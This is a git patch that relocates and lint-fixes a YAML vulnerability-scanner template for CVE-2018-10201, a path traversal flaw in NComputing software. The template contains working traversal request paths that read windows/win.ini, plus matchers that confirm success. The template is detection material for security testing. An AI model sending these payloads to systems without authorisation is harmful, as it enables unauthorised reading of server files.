From 9aad440f059982991db5b82facd7b2fd68c4cb85 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 26 Nov 2021 22:25:58 +0530 Subject: [PATCH] lint fixing --- CVE-2018-10201.yaml => cves/2018/CVE-2018-10201.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) rename CVE-2018-10201.yaml => cves/2018/CVE-2018-10201.yaml (71%) diff --git a/CVE-2018-10201.yaml b/cves/2018/CVE-2018-10201.yaml similarity index 71% rename from CVE-2018-10201.yaml rename to cves/2018/CVE-2018-10201.yaml index 0fc1f730bb..43e06fafdb 100644 --- a/CVE-2018-10201.yaml +++ b/cves/2018/CVE-2018-10201.yaml @@ -14,21 +14,21 @@ info: cve-id: CVE-2018-10201 cwe-id: CWE-22 tags: cve,cve2018,ncomputing,lfi - + requests: - method: GET path: - - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini" - - "{{BaseURL}}/...\...\...\...\...\...\...\...\...\windows\win.ini" - - "{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini" - - "{{BaseURL}}/....\....\....\....\....\....\....\....\....\windows\win.ini" + - '{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini' + - '{{BaseURL}}/...\...\...\...\...\...\...\...\...\windows\win.ini' + - '{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini' + - '{{BaseURL}}/....\....\....\....\....\....\....\....\....\windows\win.ini' stop-at-first-match: true matchers: - type: word + part: body words: - "bit app support" - "fonts" - "extensions" condition: and - part: body